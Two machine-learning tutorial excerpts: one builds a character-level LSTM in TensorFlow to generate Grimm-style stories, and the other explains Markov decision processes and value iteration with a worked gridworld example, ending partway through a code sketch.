LSTMs are heavily employed for tasks such as text generation and image caption generation. For example, language modeling is very useful for text summarization tasks or for generating captivating textual advertisements for products, while image caption generation or image annotation is very useful for image retrieval, where a user might need to retrieve images representing some concept (for example, a cat). In this tutorial, we will implement an LSTM which will generate new stories after training on a dataset of folk stories. This article is extracted from the book Natural Language Processing with TensorFlow by Thushan Ganegedara.

The application that we will cover in this article is the use of an LSTM to generate new text. For this task, we will download translations of some folk stories by the Brothers Grimm. We will use these stories to train an LSTM and ask it at the end to output a fresh new story. We will process the text by breaking it into character-level bigrams (n-grams, where n=2) and make a vocabulary out of the unique bigrams. The code for this article is available on GitHub. First, we will discuss the data we will use for text generation and the various preprocessing steps employed to clean the data.

About the dataset

We will first understand what the dataset looks like so that when we see the generated text, we can assess whether it makes sense, given the training data. We will download the first 100 books from the website https://www.cs.cmu.edu/~spok/grimmtmp/. These are translations of a set of books (from German to English) by the Brothers Grimm. Initially, we will download the first 100 books on the website with an automated script, as shown here:

    url = 'https://www.cs.cmu.edu/~spok/grimmtmp/'

    # Create a directory if needed
    dir_name = 'stories'
    if not os.path.exists(dir_name):
        os.mkdir(dir_name)

    def maybe_download(filename):
        """Download a file if not present"""
        print('Downloading file: ', dir_name + os.sep + filename)
        if not os.path.exists(dir_name + os.sep + filename):
            filename, _ = urlretrieve(url + filename, dir_name + os.sep + filename)
        else:
            print('File ', filename, ' already exists.')
        return filename

    num_files = 100
    filenames = [format(i, '03d') + '.txt' for i in range(1, 101)]
    for fn in filenames:
        maybe_download(fn)

We will now show example text snippets extracted from two randomly picked stories. The following is the first snippet:

Then she said, my dearest benjamin, your father has had these coffins made for you and for your eleven brothers, for if I bring a little girl into the world, you are all to be killed and buried in them. And as she wept while she was saying this, the son comforted her and said, weep not, dear mother, we will save ourselves, and go hence…

The second text snippet is as follows:

Red-cap did not know what a wicked creature he was, and was not at all afraid of him. "Good-day, little red-cap," said he. "Thank you kindly, wolf." "Whither away so early, little red-cap?" "To my grandmother's." "What have you got in your apron?" "Cake and wine. Yesterday was baking-day, so poor sick grandmother is to have something good, to make her stronger."…

Preprocessing data

In terms of preprocessing, we will initially make all the text lowercase and break the text into character n-grams, where n=2. Consider the following sentence:

The king was hunting in the forest.
This would break down to a sequence of n-grams, as follows:

['th', 'e ', 'ki', 'ng', ' w', 'as', …]

We will use character-level bigrams because they greatly reduce the size of the vocabulary compared with using individual words. Moreover, we will be replacing all the bigrams that appear fewer than 10 times in the corpus with a special token (that is, UNK), representing that the bigram is unknown. This helps us to reduce the size of the vocabulary even further.

Implementing an LSTM

Though there are sublibraries in TensorFlow that have already implemented LSTMs ready to go, we will implement one from scratch. This will be very valuable, as in the real world there might be situations where you cannot use these off-the-shelf components directly. We will discuss the hyperparameters used for the LSTM and their effects. Thereafter, we will discuss the parameters (weights and biases) required to implement the LSTM. We will then discuss how these parameters are used to write the operations taking place within the LSTM. This will be followed by understanding how we will sequentially feed data to the LSTM. Next, we will discuss how we can implement the optimization of the parameters using gradient clipping. Finally, we will investigate how we can use the learned model to output predictions, which are essentially bigrams that will eventually add up to a meaningful story.

Defining hyperparameters

We will define some hyperparameters required for the LSTM:

    # Number of neurons in the hidden state variables
    num_nodes = 128

    # Number of data points in a batch we process
    batch_size = 64

    # Number of time steps we unroll for during optimization
    num_unrollings = 50

    dropout = 0.2 # We use dropout

The following list describes each of the hyperparameters:

num_nodes: This denotes the number of neurons in the cell memory state. When data is abundant, increasing the complexity of the cell memory will give you better performance; however, at the same time, it slows down the computations.
batch_size: This is the amount of data processed in a single step. Increasing the size of the batch gives better performance, but poses higher memory requirements.
num_unrollings: This is the number of time steps used in truncated BPTT. The higher the number of unrolling steps, the better the performance, but it will increase both the memory requirement and the computational time.
dropout: Finally, we will employ dropout (that is, a regularization technique) to reduce overfitting of the model and produce better results; dropout randomly drops information from inputs/outputs/state variables before passing them to their successive operations. This creates redundant features during learning, leading to better performance.

Defining parameters

Now we will define TensorFlow variables for the actual parameters of the LSTM.
First, we will define the input gate parameters:

ix: These are weights connecting the input to the input gate
im: These are weights connecting the hidden state to the input gate
ib: This is the bias

Here we will define the parameters:

    # Input gate (it) - How much memory to write to cell state
    # Connects the current input to the input gate
    ix = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02))
    # Connects the previous hidden state to the input gate
    im = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02))
    # Bias of the input gate
    ib = tf.Variable(tf.random_uniform([1, num_nodes], -0.02, 0.02))

Similarly, we will define such weights for the forget gate, candidate value (used for memory cell computations), and output gate. The forget gate is defined as follows:

    # Forget gate (ft) - How much memory to discard from cell state
    # Connects the current input to the forget gate
    fx = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02))
    # Connects the previous hidden state to the forget gate
    fm = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02))
    # Bias of the forget gate
    fb = tf.Variable(tf.random_uniform([1, num_nodes], -0.02, 0.02))

The candidate value (used to compute the cell state) is defined as follows:

    # Candidate value (c~t) - Used to compute the current cell state
    # Connects the current input to the candidate
    cx = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02))
    # Connects the previous hidden state to the candidate
    cm = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02))
    # Bias of the candidate
    cb = tf.Variable(tf.random_uniform([1, num_nodes], -0.02, 0.02))

The output gate is defined as follows:

    # Output gate - How much memory to output from the cell state
    # Connects the current input to the output gate
    ox = tf.Variable(tf.truncated_normal([vocabulary_size, num_nodes], stddev=0.02))
    # Connects the previous hidden state to the output gate
    om = tf.Variable(tf.truncated_normal([num_nodes, num_nodes], stddev=0.02))
    # Bias of the output gate
    ob = tf.Variable(tf.random_uniform([1, num_nodes], -0.02, 0.02))

Next, we will define variables for the state and output. These are the TensorFlow variables representing the internal cell state and the external hidden state of the LSTM cell. When defining the LSTM computational operation, we define these to be updated with the latest cell state and hidden state values we compute, using the tf.control_dependencies(...) function.

    # Variables saving state across unrollings.
    # Hidden state
    saved_output = tf.Variable(tf.zeros([batch_size, num_nodes]),
                               trainable=False, name='train_hidden')
    # Cell state
    saved_state = tf.Variable(tf.zeros([batch_size, num_nodes]),
                              trainable=False, name='train_cell')
    # Same variables for validation phase
    saved_valid_output = tf.Variable(tf.zeros([1, num_nodes]),
                                     trainable=False, name='valid_hidden')
    saved_valid_state = tf.Variable(tf.zeros([1, num_nodes]),
                                    trainable=False, name='valid_cell')

Finally, we will define a softmax layer to get the actual predictions out:

    # Softmax Classifier weights and biases.
    w = tf.Variable(tf.truncated_normal([num_nodes, vocabulary_size], stddev=0.02))
    b = tf.Variable(tf.random_uniform([vocabulary_size], -0.02, 0.02))

Note that we're using the normal distribution with zero mean and a small standard deviation. This is fine as our model is a simple single LSTM cell.
However, when the network gets deeper (that is, multiple LSTM cells stacked on top of each other), more careful initialization techniques are required. One such initialization technique is known as Xavier initialization, proposed by Glorot and Bengio in their paper Understanding the difficulty of training deep feedforward neural networks, Proceedings of the 13th International Conference on Artificial Intelligence and Statistics, 2010. This is available as a variable initializer in TensorFlow, as shown here: https://www.tensorflow.org/api_docs/python/tf/contrib/layers/xavier_initializer.

Defining an LSTM cell and its operations

With the weights and the bias defined, we can now define the operations within an LSTM cell. These operations include the following:

Calculating the outputs produced by the input and forget gates
Calculating the internal cell state
Calculating the output produced by the output gate
Calculating the external hidden state

The following is the implementation of our LSTM cell:

    def lstm_cell(i, o, state):
        input_gate = tf.sigmoid(tf.matmul(i, ix) +
                                tf.matmul(o, im) + ib)
        forget_gate = tf.sigmoid(tf.matmul(i, fx) +
                                 tf.matmul(o, fm) + fb)
        update = tf.matmul(i, cx) + tf.matmul(o, cm) + cb
        state = forget_gate * state + input_gate * tf.tanh(update)
        output_gate = tf.sigmoid(tf.matmul(i, ox) +
                                 tf.matmul(o, om) + ob)
        return output_gate * tf.tanh(state), state

Defining inputs and labels

Now we will define the training inputs (unrolled) and labels. The training inputs form a list with num_unrollings batches of (sequential) data, where each batch of data is of size [batch_size, vocabulary_size]:

    train_inputs, train_labels = [], []
    for ui in range(num_unrollings):
        train_inputs.append(tf.placeholder(tf.float32,
                                shape=[batch_size, vocabulary_size],
                                name='train_inputs_%d'%ui))
        train_labels.append(tf.placeholder(tf.float32,
                                shape=[batch_size, vocabulary_size],
                                name='train_labels_%d'%ui))

We also define placeholders for validation inputs and outputs, which will be used to compute the validation perplexity. Note that we do not use unrolling for validation-related computations.

    # Validation data placeholders
    valid_inputs = tf.placeholder(tf.float32, shape=[1, vocabulary_size],
                                  name='valid_inputs')
    valid_labels = tf.placeholder(tf.float32, shape=[1, vocabulary_size],
                                  name='valid_labels')

Defining sequential calculations required to process sequential data

Here we will calculate the outputs produced by a single unrolling of the training inputs in a recursive manner. We will also use dropout (refer to Dropout: A Simple Way to Prevent Neural Networks from Overfitting, Srivastava, Nitish, and others, Journal of Machine Learning Research 15 (2014): 1929-1958), as this gives a slightly better performance.
Finally, we compute the logit values for all the hidden output values computed for the training data:

    # Keeps the calculated state outputs in all the unrollings
    # Used to calculate loss
    outputs = list()

    # These two python variables are iteratively updated
    # at each step of unrolling
    output = saved_output
    state = saved_state

    # Compute the hidden state (output) and cell state (state)
    # recursively for all the steps in unrolling
    for i in train_inputs:
        output, state = lstm_cell(i, output, state)
        output = tf.nn.dropout(output, keep_prob=1.0-dropout)
        # Append each computed output value
        outputs.append(output)

    # calculate the score values
    logits = tf.matmul(tf.concat(axis=0, values=outputs), w) + b

Next, before calculating the loss, we have to make sure that the output and the external hidden state are updated to the most current value we calculated earlier. This is achieved by adding a tf.control_dependencies condition and keeping the logit and loss calculation within the condition:

    with tf.control_dependencies([saved_output.assign(output),
                                  saved_state.assign(state)]):
        # Classifier.
        loss = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits_v2(
                logits=logits, labels=tf.concat(axis=0,
                                                values=train_labels)))

We also define the forward propagation logic for validation data. Note that we do not use dropout during validation, but only during training:

    # Validation phase related inference logic
    # Compute the LSTM cell output for validation data
    valid_output, valid_state = lstm_cell(
        valid_inputs, saved_valid_output, saved_valid_state)
    # Compute the logits
    valid_logits = tf.nn.xw_plus_b(valid_output, w, b)

Defining the optimizer

Here we will define the optimization process. We will use a state-of-the-art optimizer known as Adam, which is one of the best stochastic gradient-based optimizers to date. Here in the code, gstep is a variable that is used to decay the learning rate over time. We will discuss the details in the next section. Furthermore, we will use gradient clipping to avoid the exploding gradient:

    # Decays learning rate everytime the gstep increases
    tf_learning_rate = tf.train.exponential_decay(0.001, gstep,
                       decay_steps=1, decay_rate=0.5)

    # Adam Optimizer. And gradient clipping.
    optimizer = tf.train.AdamOptimizer(tf_learning_rate)
    gradients, v = zip(*optimizer.compute_gradients(loss))
    gradients, _ = tf.clip_by_global_norm(gradients, 5.0)
    optimizer = optimizer.apply_gradients(
        zip(gradients, v))

Decaying learning rate over time

As mentioned earlier, I use a decaying learning rate instead of a constant learning rate. Decaying the learning rate over time is a common technique used in deep learning for achieving better performance and reducing overfitting. The key idea here is to step down the learning rate (for example, by a factor of 0.5) if the validation perplexity does not decrease for a predefined number of epochs.
Let's see how exactly this is implemented, in more detail: First we define gstep and an operation to increment gstep, called inc_gstep as follows: # learning rate decay gstep = tf.Variable(0,trainable=False,name='global_step') # Running this operation will cause the value of gstep # to increase, while in turn reducing the learning rate inc_gstep = tf.assign(gstep, gstep+1) With this defined, we can write some simple logic to call the inc_gstep operation whenever validation loss does not decrease, as follows: # Learning rate decay related # If valid perplexity does not decrease # continuously for this many epochs # decrease the learning rate decay_threshold = 5 # Keep counting perplexity increases decay_count = 0 min_perplexity = 1e10 # Learning rate decay logic def decay_learning_rate(session, v_perplexity):    global decay_threshold, decay_count, min_perplexity    # Decay learning rate    if v_perplexity < min_perplexity:        decay_count = 0        min_perplexity= v_perplexity else:   decay_count += 1    if decay_count >= decay_threshold:        print('\t Reducing learning rate')        decay_count = 0        session.run(inc_gstep) Here we update min_perplexity whenever we experience a new minimum validation perplexity. Also, v_perplexity is the current validation perplexity. Making predictions Now we can make predictions, simply by applying a softmax activation to the logits we calculated previously. We also define prediction operation for validation logits as well: train_prediction = tf.nn.softmax(logits) # Make sure that the state variables are updated # before moving on to the next iteration of generation with tf.control_dependencies([saved_valid_output.assign(valid_output),                             saved_valid_state.assign(valid_state)]):    valid_prediction = tf.nn.softmax(valid_logits) Calculating perplexity (loss) Perplexity is a measure of how surprised the LSTM is to see the next n-gram, given the current n-gram. Therefore, a higher perplexity means poor performance, whereas a lower perplexity means a better performance: train_perplexity_without_exp = tf.reduce_sum(    tf.concat(train_labels,0)*-tf.log(tf.concat(        train_prediction,0)+1e-10))/(num_unrollings*batch_size) # Compute validation perplexity valid_perplexity_without_exp = tf.reduce_sum(valid_labels*-tf. log(valid_prediction+1e-10)) Resetting states We employ state resetting, as we are processing multiple documents. So, at the beginning of processing a new document, we reset the hidden state back to zero. However, it is not very clear whether resetting the state helps or not in practice. On one hand, it sounds intuitive to reset the memory of the LSTM cell at the beginning of each document to zero, when starting to read a new story. On the other hand, this creates a bias in state variables toward zero. We encourage you to try running the algorithm both with and without state resetting and see which method performs well. 
# Reset train state reset_train_state = tf.group(tf.assign(saved_state,                             tf.zeros([batch_size, num_nodes])),                             tf.assign(saved_output, tf.zeros(                             [batch_size, num_nodes]))) # Reset valid state reset_valid_state = tf.group(tf.assign(saved_valid_state,                             tf.zeros([1, num_nodes])),                             tf.assign(saved_valid_output,                             tf.zeros([1, num_nodes]))) Greedy sampling to break unimodality This is quite a simple technique where we can stochastically sample the next prediction out of the n best candidates found by the LSTM. Furthermore, we will give the probability of picking one candidate to be proportional to the likelihood of that candidate being the next bigram: def sample(distribution):    best_inds = np.argsort(distribution)[-3:]    best_probs = distribution[best_inds]/    np.sum(distribution[best_inds])    best_idx = np.random.choice(best_inds,p=best_probs)    return best_idx Generating new text Finally, we will define the placeholders, variables, and operations required for generating new text. These are defined similarly to what we did for the training data. First, we will define an input placeholder and variables for state and output. Next, we will define state resetting operations. Finally, we will define the LSTM cell calculations and predictions for the new text to be generated: # Text generation: batch 1, no unrolling. test_input = tf.placeholder(tf.float32, shape=[1, vocabulary_size], name = 'test_input') # Same variables for testing phase saved_test_output = tf.Variable(tf.zeros([1,                                num_nodes]),                                trainable=False, name='test_hidden') saved_test_state = tf.Variable(tf.zeros([1,                               num_nodes]),                               trainable=False, name='test_cell') # Compute the LSTM cell output for testing data test_output, test_state = lstm_cell( test_input, saved_test_output, saved_test_state) # Make sure that the state variables are updated # before moving on to the next iteration of generation with tf.control_dependencies([saved_test_output.assign(test_output),                             saved_test_state.assign(test_state)]):    test_prediction = tf.nn.softmax(tf.nn.xw_plus_b(test_output,                                    w, b)) # Reset test state reset_test_state = tf.group(    saved_test_output.assign(tf.random_normal([1,                             num_nodes],stddev=0.05)),    saved_test_state.assign(tf.random_normal([1,                            num_nodes],stddev=0.05))) Example generated text Let's take a look at some of the data generated by the LSTM after 50 steps of learning: they saw that the birds were at her bread, and threw behind him a comb which made a great ridge with a thousand times thousands of spikes. that was a collier. the nixie was at church, and thousands of spikes, they were flowers, however, and had hewn through the glass, the children had formed a hill of mirrors, and was so slippery that it was impossible for the nixie to cross it. then she thought, i will go home quickly and fetch my axe, and cut the hill of glass in half. long before she returned, however, and had hewn through the glass, the children saw her from afar, and he sat down close to it, and was so slippery that it was impossible for the nixie to cross it. 
To summarize, you can see from the output that the training corpus did contain a story about a water-nixie. However, our LSTM does not merely reproduce that text; it adds more color to the story by introducing new elements, such as a church and flowers, which were not found in the original text. To write modern natural language processing applications using deep learning algorithms and TensorFlow, you may refer to the book Natural Language Processing with TensorFlow.
What is LSTM? Implement Long-short Term Memory (LSTM) with TensorFlow Recurrent Neural Network and the LSTM Architecture
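To round off this example, here is a minimal, hypothetical sketch of the kind of training loop that would drive the graph nodes defined above (the optimizer, the perplexity nodes, decay_learning_rate, the reset operations, and the placeholders). The data_generator helper and the step counts are assumptions introduced purely for illustration; they are not part of the excerpt above.

import numpy as np
import tensorflow as tf

# Hypothetical driver loop; data_generator and the step counts are assumptions,
# everything else refers to the graph nodes defined in the excerpt above.
num_steps = 50000
valid_summary_every = 1000

with tf.Session() as session:
    tf.global_variables_initializer().run()
    for step in range(num_steps):
        # Assumed helper: returns num_unrollings one-hot input batches and labels
        batches, labels = data_generator.next_train_batch()
        feed_dict = {}
        for ui in range(num_unrollings):
            feed_dict[train_inputs[ui]] = batches[ui]
            feed_dict[train_labels[ui]] = labels[ui]
        _, l, t_perp = session.run(
            [optimizer, loss, train_perplexity_without_exp], feed_dict=feed_dict)
        if (step + 1) % 100 == 0:
            print('step', step + 1, 'loss', l, 'train perplexity', np.exp(t_perp))

        if (step + 1) % valid_summary_every == 0:
            # Assumed helper: yields one validation (input, label) pair at a time
            v_inp, v_lbl = data_generator.next_valid_example()
            v_perp = session.run(
                valid_perplexity_without_exp,
                feed_dict={valid_inputs: v_inp, valid_labels: v_lbl})
            v_perplexity = np.exp(v_perp)
            decay_learning_rate(session, v_perplexity)
            # Reset LSTM state at document boundaries, as discussed above
            session.run([reset_train_state, reset_valid_state])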
Implement Reinforcement learning using Markov Decision Process [Tutorial]

Fatema Patrawala
09 Jul 2018
11 min read
The Markov decision process, better known as MDP, is an approach in reinforcement learning to take decisions in a gridworld environment. A gridworld environment consists of states in the form of grids. The MDP tries to capture a world in the form of a grid by dividing it into states, actions, models/transition models, and rewards. The solution to an MDP is called a policy, and the objective is to find the optimal policy for that MDP task. Thus, any reinforcement learning task composed of a set of states, actions, and rewards that follows the Markov property would be considered an MDP. In this tutorial, we will dig deep into MDPs, states, actions, rewards, policies, and how to solve them using Bellman equations. This article is a reinforcement learning tutorial taken from the book, Reinforcement learning with TensorFlow.

Markov decision processes

An MDP is defined as the collection of the following:

States: S
Actions: A(s), A
Transition model: T(s,a,s') ~ P(s'|s,a)
Rewards: R(s), R(s,a), R(s,a,s')
Policy: π, where π* is the optimal policy

In the case of an MDP, the environment is fully observable, that is, whatever observation the agent makes at any point in time is enough to make an optimal decision. In the case of a partially observable environment, the agent needs a memory to store the past observations in order to make the best possible decisions. Let's try to break this into different lego blocks to understand what this overall process means.

The Markov property

In short, as per the Markov property, in order to know the information of the near future (say, at time t+1), only the present information at time t matters. Given a sequence s_0, s_1, ..., s_t, the first order of Markov says that P(s_(t+1) | s_0, s_1, ..., s_t) = P(s_(t+1) | s_t), that is, s_(t+1) depends only on s_t. Therefore, s_(t+2) will depend only on s_(t+1). The second order of Markov says that P(s_(t+2) | s_0, s_1, ..., s_(t+1)) = P(s_(t+2) | s_t, s_(t+1)), that is, s_(t+2) depends only on s_t and s_(t+1).

In our context, we will follow the first order of the Markov property from now on. Therefore, we can convert any process to a Markov property if the probability of the new state, say s_(t+1), depends only on the current state, s_t, such that the current state captures and remembers the property and knowledge from the past. Thus, as per the Markov property, the world (that is, the environment) is considered to be stationary, that is, the rules in the world are fixed.

The S state set

The S state set is a set of different states, represented as s, which constitute the environment. States are the feature representation of the data obtained from the environment. Thus, any input from the agent's sensors can play an important role in state formation. State spaces can be either discrete or continuous. The agent starts from the start state and has to reach the goal state in the most optimized path without ending up in bad states (like the red-colored state shown in the diagram below).

Consider the following gridworld as having 12 discrete states, where the green-colored grid is the goal state, red is the state to avoid, and black is a wall that you'll bounce back from if you hit it head on:

The states can be represented as 1, 2, ..., 12 or by coordinates, (1,1), (1,2), ..., (3,4).

Actions

The actions are the things an agent can perform or execute in a particular state. In other words, actions are the sets of things an agent is allowed to do in the given environment. Like states, actions can also be either discrete or continuous.
Consider the following gridworld example having 12 discrete states and 4 discrete actions (UP, DOWN, RIGHT, and LEFT):

The preceding example shows the action space to be a discrete set space, that is, a ∈ A, where A = {UP, DOWN, RIGHT, LEFT}. It can also be treated as a function of state, that is, a = A(s), where the set of possible actions depends on the current state.

Transition model

The transition model T(s, a, s') is a function of three variables, which are the current state (s), the action (a), and the new state (s'), and it defines the rules to play the game in the environment. It gives the probability P(s'|s, a), that is, the probability of landing in the new state s' given that the agent takes the action a in the given state s. The transition model plays a crucial role in a stochastic world, unlike a deterministic world, where the probability for any landing state other than the determined one is zero.

Let's consider the following environment (world) and consider the different cases, determined and stochastic, where the actions are a ∈ A, with A = {UP, DOWN, RIGHT, LEFT}. The behavior of these two cases depends on certain factors:

Determined environment: In a determined environment, if you take a certain action, say UP, you will certainly perform that action with probability 1.
Stochastic environment: In a stochastic environment, if you take the same action, say UP, there is a probability of 0.8 of actually performing the given action, and a probability of 0.1 each of performing an action perpendicular to the given action UP (that is, LEFT or RIGHT). Here, for the state s and the UP action, the transition model gives T(s, UP, s') = P(s'|s, UP) = 0.8, where s' is the state directly above s.

Since T(s,a,s') ~ P(s'|s,a), the probability of the new state depends on the current state and action only, and on none of the past states. Thus, the transition model follows the first-order Markov property.

We can also say that our universe is a stochastic environment, since the universe is composed of atoms that are in different states defined by position and velocity. Actions performed by each atom change their states and cause changes in the universe.

Rewards

The reward of a state quantifies the usefulness of entering into that state. There are three different forms to represent the reward, namely R(s), R(s, a), and R(s, a, s'), but they are all equivalent. For a particular environment, domain knowledge plays an important role in the assignment of rewards for different states, as minor changes in the reward do matter for finding the optimal solution to an MDP problem.

There are two approaches to rewarding our agent for taking a certain action. They are:

Credit assignment problem: We look at the past and check which actions led to the present reward, that is, which action gets the credit.
Delayed rewards: In contrast, in the present state, we check which action to take that will lead us to potential rewards.

Delayed rewards form the idea of foresight planning. Therefore, this concept is used to calculate the expected reward for different states. We will discuss this in the later sections.

Policy

Until now, we have covered the blocks that create an MDP problem, that is, states, actions, transition models, and rewards; now comes the solution. The policy is the solution to an MDP problem. The policy is a function that takes the state as an input and outputs the action to be taken. Therefore, the policy is a command that the agent has to obey.
π* is called the optimal policy, which maximizes the expected reward. Among all the policies taken, the optimal policy is the one that maximizes the amount of reward received, or expected to be received, over a lifetime. For an MDP, there's no end to the lifetime, so you have to decide the end time. Thus, the policy is nothing but a guide telling us which action to take for a given state. It is not a plan, but it uncovers the underlying plan of the environment by returning the actions to take for each state.

The Bellman equations

Since the optimal π* policy is the policy that maximizes the expected rewards,

π* = argmax_π E[ Σ_t R(s_t) | π ]

where E[ Σ_t R(s_t) | π ] means the expected value of the rewards obtained from the sequence of states the agent observes if it follows the π policy. Thus, argmax_π outputs the π policy that has the highest expected reward.

Similarly, we can also calculate the utility of a policy at a state, that is, if we are at the state s, given a π policy, then the utility of the π policy for the state s, that is, U^π(s), would be the expected rewards from that state onward:

U^π(s) = E[ Σ_t γ^t R(s_t) | π, s_0 = s ]

The immediate reward of the state, that is, R(s), is different from the utility U(s) of the state (that is, the utility of the optimal policy of the s state) because of the concept of delayed rewards. From now onward, the utility of the s state will refer to the utility of the optimal policy of the state, that is, U(s).

Moreover, the optimal policy can also be regarded as the policy that maximizes the expected utility. Therefore,

π*(s) = argmax_a Σ_s' T(s,a,s') U(s')

where T(s,a,s') is the transition probability, that is, P(s'|s,a), and U(s') is the utility of the new landing state after the action a is taken in the state s. The term Σ_s' T(s,a,s') U(s') refers to the summation over all possible new state outcomes for a particular action taken; whichever action gives the maximum value of Σ_s' T(s,a,s') U(s') is considered to be part of the optimal policy, and thereby the utility of the state s is given by the following Bellman equation:

U(s) = R(s) + γ max_a Σ_s' T(s,a,s') U(s')

where R(s) is the immediate reward and γ max_a Σ_s' T(s,a,s') U(s') is the reward from the future, that is, the discounted utilities of the states that the agent can reach from the given state s if the action a is taken.

Solving the Bellman equation to find policies

Say we have n states in the given environment. If we look at the Bellman equation, we have n equations and n unknowns, but the max_a function makes them non-linear. Thus, we cannot solve them as linear equations. Therefore, in order to solve them:

Start with an arbitrary utility.
Update the utilities based on the neighborhood until convergence, that is, update the utility of the state using the Bellman equation based on the utilities of the landing states from the given state.
Iterate this multiple times to converge to the true value of the states.

This process of iterating to convergence towards the true value of the state is called value iteration. For the terminal states where the game ends, the utility of those terminal states equals the immediate reward the agent receives while entering the terminal state.

Let's try to understand this by implementing an example.

An example of value iteration using the Bellman equation

Consider the following environment and the given information:

Given information: A, C, and X are the names of some states. The green-colored state is the goal state, G, with a reward of +1. The red-colored state is the bad state, B, with a reward of -1; try to prevent your agent from entering this state. Thus, the green and red states are the terminal states; enter either and the game is over.
If the agent encounters the green state, that is, the goal state, the agent wins, while if they enter the red state, then the agent loses the game. The discount factor is γ = 0.5, R(s) = -0.04 (that is, the reward for all states except the G and B states is -0.04), and U_0(s) = 0 (that is, the utility at the first time step is 0, except for the G and B states). The transition probability T(s,a,s') equals 0.8 if going in the desired direction; otherwise, it is 0.1 each if going perpendicular to the desired direction. For example, if the action is UP, then with 0.8 probability the agent goes UP, but with 0.1 probability it goes RIGHT and 0.1 to the LEFT.

Questions:

Find U_1(X), the utility of the X state at time step 1, that is, after the agent goes through one iteration.
Similarly, find U_2(X).

Solution:

R(X) = -0.04

Action a | s' | T(s,a,s') | U_0(s') | T(s,a,s') x U_0(s')
RIGHT | G | 0.8 | +1 | 0.8 x 1 = 0.8
RIGHT | C | 0.1 | 0 | 0.1 x 0 = 0
RIGHT | X | 0.1 | 0 | 0.1 x 0 = 0

Thus, for action a = RIGHT, Σ_s' T(X,a,s') U_0(s') = 0.8.

Action a | s' | T(s,a,s') | U_0(s') | T(s,a,s') x U_0(s')
DOWN | C | 0.8 | 0 | 0.8 x 0 = 0
DOWN | G | 0.1 | +1 | 0.1 x 1 = 0.1
DOWN | A | 0.1 | 0 | 0.1 x 0 = 0

Thus, for action a = DOWN, Σ_s' T(X,a,s') U_0(s') = 0.1.

Action a | s' | T(s,a,s') | U_0(s') | T(s,a,s') x U_0(s')
UP | X | 0.8 | 0 | 0.8 x 0 = 0
UP | G | 0.1 | +1 | 0.1 x 1 = 0.1
UP | A | 0.1 | 0 | 0.1 x 0 = 0

Thus, for action a = UP, Σ_s' T(X,a,s') U_0(s') = 0.1.

Action a | s' | T(s,a,s') | U_0(s') | T(s,a,s') x U_0(s')
LEFT | A | 0.8 | 0 | 0.8 x 0 = 0
LEFT | X | 0.1 | 0 | 0.1 x 0 = 0
LEFT | C | 0.1 | 0 | 0.1 x 0 = 0

Thus, for action a = LEFT, Σ_s' T(X,a,s') U_0(s') = 0.

Therefore, among all actions, max_a Σ_s' T(X,a,s') U_0(s') = 0.8, for a = RIGHT.

Therefore, U_1(X) = R(X) + γ max_a Σ_s' T(X,a,s') U_0(s') = -0.04 + 0.5 x 0.8 = 0.36, where γ = 0.5 and R(X) = -0.04.

Similarly, calculate U_1(A) and U_1(C), and we get U_1(A) = -0.04 and U_1(C) = -0.04.

Since U_1(X) = 0.36, U_1(A) = -0.04, U_1(C) = -0.04, and R(X) = -0.04:

Action a | s' | T(s,a,s') | U_1(s') | T(s,a,s') x U_1(s')
RIGHT | G | 0.8 | +1 | 0.8 x 1 = 0.8
RIGHT | C | 0.1 | -0.04 | 0.1 x -0.04 = -0.004
RIGHT | X | 0.1 | 0.36 | 0.1 x 0.36 = 0.036

Thus, for action a = RIGHT, Σ_s' T(X,a,s') U_1(s') = 0.832.

Action a | s' | T(s,a,s') | U_1(s') | T(s,a,s') x U_1(s')
DOWN | C | 0.8 | -0.04 | 0.8 x -0.04 = -0.032
DOWN | G | 0.1 | +1 | 0.1 x 1 = 0.1
DOWN | A | 0.1 | -0.04 | 0.1 x -0.04 = -0.004

Thus, for action a = DOWN, Σ_s' T(X,a,s') U_1(s') = 0.064.

Action a | s' | T(s,a,s') | U_1(s') | T(s,a,s') x U_1(s')
UP | X | 0.8 | 0.36 | 0.8 x 0.36 = 0.288
UP | G | 0.1 | +1 | 0.1 x 1 = 0.1
UP | A | 0.1 | -0.04 | 0.1 x -0.04 = -0.004

Thus, for action a = UP, Σ_s' T(X,a,s') U_1(s') = 0.384.

Action a | s' | T(s,a,s') | U_1(s') | T(s,a,s') x U_1(s')
LEFT | A | 0.8 | -0.04 | 0.8 x -0.04 = -0.032
LEFT | X | 0.1 | 0.36 | 0.1 x 0.36 = 0.036
LEFT | C | 0.1 | -0.04 | 0.1 x -0.04 = -0.004

Thus, for action a = LEFT, Σ_s' T(X,a,s') U_1(s') = 0.

Therefore, among all actions, max_a Σ_s' T(X,a,s') U_1(s') = 0.832, for a = RIGHT.

Therefore, U_2(X) = R(X) + γ max_a Σ_s' T(X,a,s') U_1(s') = -0.04 + 0.5 x 0.832 = 0.376.

Therefore, the answers to the preceding questions are: U_1(X) = 0.36 and U_2(X) = 0.376.

Policy iteration

The process of obtaining the optimal utility by iterating over the policy, and updating the policy itself instead of the value until the policy converges to the optimum, is called policy iteration. The process of policy iteration is as follows:

Start with a random policy, π_0.
For the given π_t policy at iteration step t, calculate the utilities U_t = U^(π_t) by using the following formula: U_t(s) = R(s) + γ Σ_s' T(s, π_t(s), s') U_t(s').
Improve the policy by π_(t+1)(s) = argmax_a Σ_s' T(s,a,s') U_t(s').

This ends an interesting reinforcement learning tutorial. Want to implement state-of-the-art Reinforcement Learning algorithms from scratch? Get this best-selling title, Reinforcement Learning with TensorFlow. How Reinforcement Learning works Convolutional Neural Networks with Reinforcement Learning Getting started with Q-learning using TensorFlow
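As a programmatic companion to the hand calculation above, the following is a small value-iteration sketch for a gridworld of this shape. The neighbour layout (G to the right of X, C below X, A to the left of X, B below G, and the wall at the centre of the grid), γ = 0.5, and R(s) = -0.04 follow the worked example; the code itself is an illustrative assumption rather than an excerpt from the book.

# Value iteration for the 4 x 3 gridworld used in the example above.
# Coordinates are (column, row); row 3 is the top row.
GAMMA = 0.5
STEP_REWARD = -0.04

GOAL, BAD, WALL = (4, 3), (4, 2), (2, 2)
STATES = [(c, r) for c in range(1, 5) for r in range(1, 4) if (c, r) != WALL]
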